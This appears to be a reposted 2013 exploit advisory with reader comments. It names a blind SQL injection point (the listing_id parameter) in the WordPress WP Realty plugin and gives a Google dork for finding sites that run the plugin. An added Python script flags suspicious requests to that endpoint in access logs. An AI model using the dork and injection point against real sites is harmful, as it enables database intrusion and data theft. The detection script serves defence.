WordPress WP Realty Blind SQL Injection
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
Credits to: Greek Hacking Scene
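
A defender-side check for the endpoint and parameter named in the advisory, as an added example that is not part of the original post: it scans web access logs for requests to index_ext.php whose listing_id is not a plain integer. The common/combined log format, the assumption that legitimate listing_id values are integers, and the sample lines are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter names are taken from the advisory above.
VULN_PATH = "/wp-content/plugins/wp-realty/index_ext.php"
PARAM = "listing_id"

# Assumption: common/combined access log format; only the client IP and request line are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

# Constructed sample lines, not taken from any real server.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Aug/2013:10:00:01 +0000] "GET /wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=12 HTTP/1.1" 200 512
203.0.113.9 - - [10/Aug/2013:10:00:05 +0000] "GET /wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=12%27 HTTP/1.1" 200 512
203.0.113.9 - - [10/Aug/2013:10:00:09 +0000] "GET /wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=12&listing_id=x%20y HTTP/1.1" 200 512
198.51.100.7 - - [10/Aug/2013:10:00:11 +0000] "GET /wordpress/?p=1 HTTP/1.1" 200 2048
"""

def suspicious_requests(log_text):
    """Return {client_ip: [decoded listing_id values]} for non-integer values sent to the endpoint."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access log entry
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith(VULN_PATH):
            continue  # some other page
        # parse_qs URL-decodes values and keeps every repeat of a parameter,
        # so a clean first value cannot hide a second, malformed one.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get(PARAM, []):
            # Assumption: a legitimate listing id is a short run of ASCII digits.
            if not re.fullmatch(r"[0-9]{1,10}", value):
                hits[m.group("ip")].append(value)
    return dict(hits)

if __name__ == "__main__":
    for ip, values in suspicious_requests(SAMPLE_LOG).items():
        print(ip, values)
```

The check only sees query strings recorded in the log; values sent in a POST body need the same integer test at a WAF or in the application itself.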
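10 comments
Sigh, after this I don't dare use third-party plugins with WordPress anymore.
Third-party stuff really is a pain~
I don't dare use plugins or other themes when installing WP anymore...
Heh... looks like a rarely used plugin...
Showing my support QQQQQQQQQQQQQQQQQQQQ
Thanks for sharing.
Third-party plugin
Third-party plugin
Looks like it's a plugin again... developers these days, sigh. WP's lifelong reputation ruined in an instant.
First reply. The mass (batch) version for WordPress is already out; I saw it the day before yesterday.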